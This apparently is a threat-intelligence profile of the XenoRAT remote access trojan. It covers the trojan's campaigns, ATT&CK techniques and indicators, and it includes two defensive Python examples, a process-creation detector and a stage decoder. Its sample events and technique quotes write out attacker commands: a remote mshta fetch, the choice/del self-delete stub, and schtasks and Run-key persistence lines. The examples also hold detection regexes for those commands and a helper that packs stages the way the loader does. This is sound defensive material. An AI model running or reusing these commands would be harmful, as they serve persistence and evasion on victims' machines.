XenoRAT
XenoRAT is an open-source .NET remote access trojan publicly available on GitHub and used by multiple threat actors for persistent remote access, surveillance, and post-exploitation. Reported capabilities include encrypted TCP command-and-control, dynamic DLL loading via Assembly.Load, file operations, command execution, keylogging, screen capture, clipboard monitoring, webcam and microphone surveillance, SOCKS5 tunneling or reverse proxying, Hidden VNC/HVNC, process manipulation, file exfiltration, antivirus enumeration, and self-uninstall. Observed persistence mechanisms include HKCU\Software\Microsoft\Windows\CurrentVersion\Run entries, scheduled tasks such as XenoUpdateManager, and mutexes including clouda and Xeno_rat_nd8912d.
The malware has been delivered through spear-phishing emails, ZIP archives containing malicious LNK files, HTA and PowerShell chains, BAT/VBS/Python loaders, GitHub-hosted payloads, drive-by delivery, and Excel XLL add-ins built with Excel-DNA. Multiple campaigns used decoy PDFs or documents while silently installing XenoRAT.

In Seqrite’s Operation XENOFISCAL, a Pakistan-linked SideCopy cluster under the Transparent Tribe/APT36 umbrella targeted Afghanistan’s Ministry of Finance and provincial finance offices using Pashto-language phishing lures, mshta.exe, obfuscated JavaScript, in-memory .NET loading, and a compromised Afghan education domain, ultimately deploying XenoRAT 1.8.7 and communicating with 185.235.137.106. Fortinet also linked earlier DPRK-related LNK campaigns targeting South Korean organizations to XenoRAT distribution before later variants shifted toward deeper surveillance using GitHub-based C2. AhnLab documented South Korea-focused spear-phishing chains that exfiltrated system information and deployed XenoRAT. Breakglass Intelligence observed a German-language SERPENTINE#CLOUD wave targeting German small businesses that injected XenoRAT v1.8.7 into explorer.exe via Early Bird APC injection and used C2 176.96.136.182, install path %LOCALAPPDATA%\XenoManager, and startup name XenoUpdateManager. Securonix also observed XenoRAT delivered as the encrypted shellcode blob xn.bin and injected into suspended explorer.exe processes.
A customized variant, MoonPeak, is described as a modified XenoRAT codebase associated with DPRK-linked activity, including campaigns targeting South Korean users and financially motivated operations against retail cryptocurrency traders. Kimsuky reporting also lists XenoRAT among the group’s open-source RAT arsenal. High-confidence indicators stated directly in the cited reporting are: C2 IPs 185.235.137.106 and 176.96.136.182 for XenoRAT and 27.102.137.88:443 for MoonPeak; mutexes clouda and Xeno_rat_nd8912d for XenoRAT and Dansweit_Hk65-PSAccerdle for MoonPeak; scheduled task names XenoUpdateManager, ChromeCheck, and EdgeCheck in the related delivery chains; the install path %LOCALAPPDATA%\XenoManager; and payload filenames such as xn.bin and frexs.bin.
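The persistence, self-deletion and injection artifacts summarized above all leave traces in process-creation telemetry. What follows is an added example, not code from this page, from Mallory, or from any of the vendor reports cited: a Python triage pass over Sysmon Event ID 1 / Windows 4688 style events that flags the reported chain (mshta.exe fetching a remote HTA, the choice/del self-delete stub, the XenoUpdateManager task, a Run-key write, an explorer.exe with an unexpected parent, and anything living under %LOCALAPPDATA%\XenoManager). The event fields, the sample events, the dropped file name svc.exe, the sample user and URL, and the baseline of legitimate explorer.exe parents are assumptions made for illustration; the scheduled task is matched on a schtasks.exe command line, which assumes the task is created that way rather than through the Task Scheduler API.

```python
"""Process-creation triage for the XenoRAT delivery and persistence chain.

Added example, not vendor or project code. Events are a constructed subset of
Sysmon Event ID 1 / Windows 4688 fields; the file name svc.exe, the sample user
and URL, and the explorer.exe parent baseline are assumptions for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Artifacts named in public reporting on XenoRAT.
XENO_TASK_NAMES = {"xenoupdatemanager", "chromecheck", "edgecheck"}
XENO_INSTALL_DIR = "\\xenomanager\\"            # %LOCALAPPDATA%\XenoManager\

# Reported self-delete stub: cmd /C choice /C Y /N /D Y /T <n> & Del <file>
SELF_DELETE_RE = re.compile(r"choice\s+/c\s+y\s+/n\s+/d\s+y\s+/t\s+\d+\s*&\s*del\b", re.I)
# mshta.exe pulling its HTA from a URL or UNC path instead of a local file.
REMOTE_SRC_RE = re.compile(r"(https?://|\\\\)\S+", re.I)
TASK_NAME_RE = re.compile(r'/tn\s+"?([^\s"]+)', re.I)
RUN_KEY_RE = re.compile(r"software\\microsoft\\windows\\currentversion\\run\b", re.I)
# Assumed baseline of legitimate explorer.exe parents; tune to your environment.
EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe", "svchost.exe"}


@dataclass(frozen=True)
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips, in a fixed order."""
    hits: list[str] = []
    img, parent, cl = _base(ev.image), _base(ev.parent_image), ev.command_line
    if img == "mshta.exe" and REMOTE_SRC_RE.search(cl):
        hits.append("mshta_remote_hta")
    if img == "cmd.exe" and SELF_DELETE_RE.search(cl):
        hits.append("self_delete_choice_del")
    if img == "schtasks.exe":
        m = TASK_NAME_RE.search(cl)
        if m and m.group(1).lower() in XENO_TASK_NAMES:
            hits.append("schtask_xeno_name")
    if img == "reg.exe" and RUN_KEY_RE.search(cl):
        hits.append("run_key_via_reg")
    # A suspended explorer.exe created by an injector appears here with an
    # unexpected parent; on its own this is a lead, not proof of APC injection.
    if img == "explorer.exe" and parent not in EXPLORER_PARENTS:
        hits.append("explorer_unusual_parent")
    if XENO_INSTALL_DIR in ev.image.lower() or XENO_INSTALL_DIR in ev.parent_image.lower():
        hits.append("xeno_install_path")
    return hits


def hunt(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """(event index, rule name) for every hit across a batch of events."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


# Constructed sample telemetry: five events in the reported shape plus two benign ones.
_LOADER = r"C:\Users\u\AppData\Local\XenoManager\svc.exe"   # assumed dropped file name
EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\mshta.exe" https://example.invalid/update.hta'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", _LOADER,
              r'cmd.exe /C choice /C Y /N /D Y /T 3 & Del "C:\Users\u\Downloads\stage.exe"'),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", _LOADER,
              f'schtasks /create /tn XenoUpdateManager /tr "{_LOADER}" /sc onlogon'),
    ProcEvent(r"C:\Windows\System32\reg.exe", _LOADER,
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v XenoManager /t REG_SZ /d "'
              + _LOADER + '"'),
    ProcEvent(r"C:\Windows\explorer.exe", _LOADER, "explorer.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd.exe /C dir"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
]

if __name__ == "__main__":
    for idx, rule in hunt(EVENTS):
        print(f"event {idx}: {rule}")
```

The rules are deliberately narrow: the self-delete regex matches the exact argument order reported, and the task-name and install-path checks are string matches, so a rebuilt sample with a renamed task or directory will only surface through the explorer.exe parent heuristic, which needs a baseline from your own fleet before it is useful.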
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
“Although XMRig CoinMiner is installed in the end, XenoRAT and a vulnerability scanner script are also installed.”
Groups observed using it
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Seqrite Labs identified a sophisticated SideCopy XenoRAT malware attack focused directly on government networks.
The group’s arsenal includes proprietary malware such as PebbleDash, BabyShark, AppleSeed, and RandomQuery, as well as open-source RATs like xRAT, XenoRAT, and TutRAT.
While earlier versions spread the XenoRAT malware, the current version focuses on deep surveillance.
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 technique
This level of detail indicates that the threat actors conducted thorough prior reconnaissance.
Resource Development
1 technique
The malicious files were delivered through infrastructure hosted on Afghan government servers, allowing the attackers to blend their traffic with legitimate state communications and evade network-level detection.
Initial Access
2 techniques
The attackers used phishing emails containing ZIP archives with a malicious file masquerading as an internal government document.
The complex intrusion sequence initiates through a tailored spear-phishing email delivery path. This electronic mail contains a compressed archive enclosing a fraudulent shortcut file.
Execution
5 techniques
It connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.
That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory.
Subsequently, the remote web application processes a heavily obfuscated JavaScript payload within the host memory space.
The function manages the dynamic loading and execution of external DLL modules received through a remote Node connection... loads it dynamically using Assembly.Load.
Consequently, unsuspecting provincial finance officials clicked the attachment.
Persistence
2 techniques
It connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.
Privilege Escalation
3 techniques
It connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... copies the reconstructed shellcode buffer into the allocated region... and transfers execution to the injected buffer through the CreateThread() API.
Defense Evasion
11 techniques
The loader script implements a custom Base64 decoding routine to hide its downstream modules.
This staged approach is commonly used in fileless malware... reconstruct the serialized payload entirely in memory without touching disk.
To ensure a long-term presence, the software establishes automated registry execution keys that masquerade as legitimate Windows applications.
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... copies the reconstructed shellcode buffer into the allocated region... and transfers execution to the injected buffer through the CreateThread() API.
It launches a hidden cmd.exe process with a Base64-decoded command (/C choice /C Y /N /D Y /T 3 & Del) that waits for a few seconds and then deletes the running executable file from disk.
The malware later decompresses and decodes the data to reconstruct the final HTA payload... The routine first decodes the Base64 blob... and utilizes the .NET GZipStream class to restore the original payload buffer.
Instead of dropping a binary immediately, the shortcut covertly launches the native Windows command tool mshta.exe. This legitimate system binary fetches an externally hosted hypertext application file from a compromised domain.
The malware runs a mutex called “clouda” to prevent duplicate instances, and it queries installed antivirus products before reporting back to its operators.
The malware creates a directory named USOShared-1de48789-1285 under C:\Users\Public\ to store the next-stage HTA payload... The directory naming convention mimics application-generated cache or profile folders.
Specifically, the malware handles this payload reconstruction phase strictly within volatile memory.
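The stage reconstruction quoted under Execution and in this section (a custom Base64 routine, then a GZipStream inflate, all in memory) is straightforward to reverse once a blob has been captured from a URL or a memory dump. The following is an added example, not the loader's code or any vendor's tooling: a Python decoder that maps an arbitrary Base64 alphabet onto the standard one, checks the gzip magic before inflating, and labels what came out (a PE, which covers .NET assemblies, an HTA/script, or unknown). The page does not publish the loader's real alphabet, so the alphabet parameter, the rotated sample alphabet and the sample HTA below are assumptions; the packer function exists only to build the constructed sample.

```python
"""Recover a stage packed as Base64 over GZIP, as described for the XenoRAT
loader chain. Added example, not the loader's or any vendor's code. The
loader's custom Base64 alphabet is not given on the page; the alphabet
parameter and the sample alphabet here are assumptions."""
from __future__ import annotations

import base64
import gzip
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
GZIP_MAGIC = b"\x1f\x8b"


def custom_b64decode(text: str, alphabet: str = STD_ALPHABET) -> bytes:
    """Decode Base64 written with an arbitrary 64-character alphabet.

    The custom alphabet is mapped onto the standard one so the stock decoder
    does the bit-level work; whitespace and stray characters are dropped and
    missing '=' padding is restored before decoding."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64 or "=" in alphabet:
        raise ValueError("alphabet must be 64 distinct characters without '='")
    cleaned = "".join(ch for ch in text if ch in alphabet or ch == "=")
    std = cleaned.translate(str.maketrans(alphabet, STD_ALPHABET))
    std += "=" * (-len(std) % 4)
    return base64.b64decode(std, validate=True)


def classify(payload: bytes) -> str:
    """Cheap type guess for the recovered stage: PE (incl. .NET), HTA/script, or unknown."""
    if payload[:2] == b"MZ":
        return "pe"
    head = payload[:512].lower()
    if b"<hta:application" in head or b"<script" in head or b"<html" in head:
        return "hta"
    return "unknown"


def unpack_stage(encoded: str, alphabet: str = STD_ALPHABET) -> tuple[str, bytes]:
    """Base64-decode, verify the gzip magic, inflate, and classify the stage.

    Raises ValueError when the alphabet is wrong or the blob is not gzip, so
    a mis-guessed alphabet fails loudly instead of producing garbage."""
    raw = custom_b64decode(encoded, alphabet)
    if raw[:2] != GZIP_MAGIC:
        raise ValueError("decoded blob is not gzip: wrong alphabet or a different packer")
    payload = gzip.decompress(raw)
    return classify(payload), payload


# --- constructed sample input: emulate the packer so the decoder has something to run on ---
SAMPLE_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]   # hypothetical rotated alphabet
SAMPLE_HTA = (b'<html><head><hta:application id="u" windowstate="minimize" showintaskbar="no"/>'
              b'<script language="VBScript">MsgBox "stage"</script></head></html>')


def pack_stage(payload: bytes, alphabet: str = STD_ALPHABET) -> str:
    """Inverse of unpack_stage; used only to build the constructed sample blob."""
    std = base64.b64encode(gzip.compress(payload, mtime=0)).decode("ascii")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


SAMPLE_BLOB = pack_stage(SAMPLE_HTA, SAMPLE_ALPHABET)

if __name__ == "__main__":
    kind, data = unpack_stage(SAMPLE_BLOB, SAMPLE_ALPHABET)
    print(kind, len(data), data[:40])
```

When the alphabet is unknown, the gzip magic check is the oracle: decode the first few characters under each candidate mapping (the loader's decode table lifted from the script, or its inverse) and keep the one that yields 1f 8b.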
Credential Access
1 technique
Discovery
3 techniques
The script then checks whether the .NET Framework version v4.0.30319 is installed by querying the registry path HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319.
dynamically selects the download endpoint based on the victim operating system version. Systems identified as Windows 7 (Version 6.1) are redirected to an alternate payload location.
Collection
3 techniques
Performs keylogging, screen capture, clipboard monitoring, and webcam/microphone surveillance.
Command and Control
7 techniques
Subsequently, once fully initialized, the backdoor implants open a persistent command channel back to the malicious operators. This outgoing data stream targets a dedicated server node located at internet protocol destination 185.235.137.106.
After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af... The final stage deployed XenoRAT 1.8.7... which established an encrypted connection to a bulletproof server in Frankfurt, Germany.
Supports SOCKS5 proxy-based network tunneling.
ConnectAndSetupAsync function is responsible for establishing and initializing a TCP-based command-and-control (C2) connection between the client and the remote server.
Once opened, the file silently installed XenoRAT, an open-source remote access trojan that allows attackers to maintain long-term access to infected systems.
Other
1 technique
IOCs tracked for this family
40 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
28 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An open-source remote access trojan used in a targeted espionage campaign against government networks. It is delivered via spear-phishing, executed through a fileless chain using mshta.exe and obfuscated JavaScript/.NET payload reconstruction in memory, then establishes persistence via registry run keys and opens a command channel to attacker-controlled infrastructure.
Open-source remote access trojan used by SideCopy in Operation XENOFISCAL to establish persistent access, communicate over encrypted TCP, register persistence via a scheduled task and Registry Run key, prevent duplicate execution with a mutex, and query installed antivirus products before reporting to operators.
An open-source remote access trojan used to maintain long-term access to infected systems, connect to attacker-controlled servers, spy on infected computers, and enable additional malicious activities.
Open-source remote access trojan used for persistent remote access, surveillance, and post-exploitation. The report describes encrypted TCP C2, dynamic in-memory DLL loading, command execution, file management, keylogging, screen capture, clipboard monitoring, webcam/microphone surveillance, SOCKS5 tunneling, persistence via Scheduled Tasks and Run keys, and self-uninstall/self-deletion.